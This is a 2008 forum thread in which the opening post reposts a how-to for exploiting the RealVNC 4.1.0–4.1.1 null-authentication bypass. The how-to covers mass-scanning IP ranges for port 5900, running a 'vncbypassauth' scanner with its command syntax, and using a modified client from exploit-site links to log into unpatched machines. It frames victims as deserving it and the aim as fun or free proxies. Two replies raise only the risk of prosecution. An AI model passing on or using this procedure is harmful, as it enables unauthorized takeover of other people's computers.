1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Free Proxies for ALL!

Discussion in 'Proxies' started by bigkee42, Oct 18, 2008.

  1. bigkee42

    bigkee42 Junior Member

    Dec 10, 2007
    Likes Received:
    Don't Laugh...US Air Force
    North Dakota
    I found this while surfing. I do not know if it is on here somewhere, but here goes.

    "This technique/method is rather 'noobish' and will be frowned upon.

    A while ago there was a problem with RealVNC 4.1.0 - 4.1.1 which aloud remote users to authenticate without the real password, aka: null authentication. The sad thing is that a lot of people haven't updated to newer software, thus can be exploited. What the hell, they deserve it.

    Basically the VNC modified client specifies null authentication to the server, regardless of if there's authentication, the server will accept it and authenticate using null.

    This is generally easier in 'Windoze', because you need the required modified VNC client, I don't know if there's a modified version for Linux, you'll have to check that for yourself.

    Basically, You scan IP ranges for servers with port 5900 (VNC) open, and then you can check if they're exploitable using the modified VNC client.

    You can use nmap to do the scanning, but if you're not familiar with it,
    you're recommended to use this file;

    VNC vunerability scanner:

    windows: http://www.milw0rm.com/sploits/05172006-VN...pauth-win32.rar
    linux: http://www.milw0rm.com/sploits/05172006-VN...th-linux.tar.gz

    You run it via cmd or a shell.

    Use the syntax

    "vncbypassauth -i [IP-ADDRESS] -p [5900] [-cT or -vnc]"

    : -i specified the ip address
    : -p specifies the portthe
    : -cT or -vnc is the scantype, -cT is connect() and may be required in windows.

    You can specify a whole range by using;


    So the syntax put together might look like this;

    vncbypassauth -i -p 5900 -cT

    By default it should save a file with information about filtered,closed and open ports in your home directory/My documents.

    When you check the newly created text file, and you find a IP which has port 5900 open (they're running VNC) then open the modified VNC client;
    Which can be found here: http://www.milw0rm.com/sploits/05162006-BL...-authbypass.rar
    (at the moment I'm not aware of a modified client for Linux, if you know of one, notify me and i'll edit the tutorial)

    Then Just enter the ip and then BOOM. It should authenticate you, and if it doesn't the chances are the server has an up-to-date version of VNC.

    This can be fun for newbies, or maybe you need a private proxy or something."

    Moderators, please delete if you deem necessary.
  2. seodeveloping

    seodeveloping BANNED BANNED

    Oct 17, 2008
    Likes Received:
    Interesting. As much as I want to try taking over machines running VNC, that's a serious problem is you get nailed. All you need to do is pick the wrong machine and you're screwed.
  3. raiderred

    raiderred Newbie

    Jan 2, 2009
    Likes Received:
    Some big powerful companies run VNC, and if you hack them, you may end up getting prosecuted.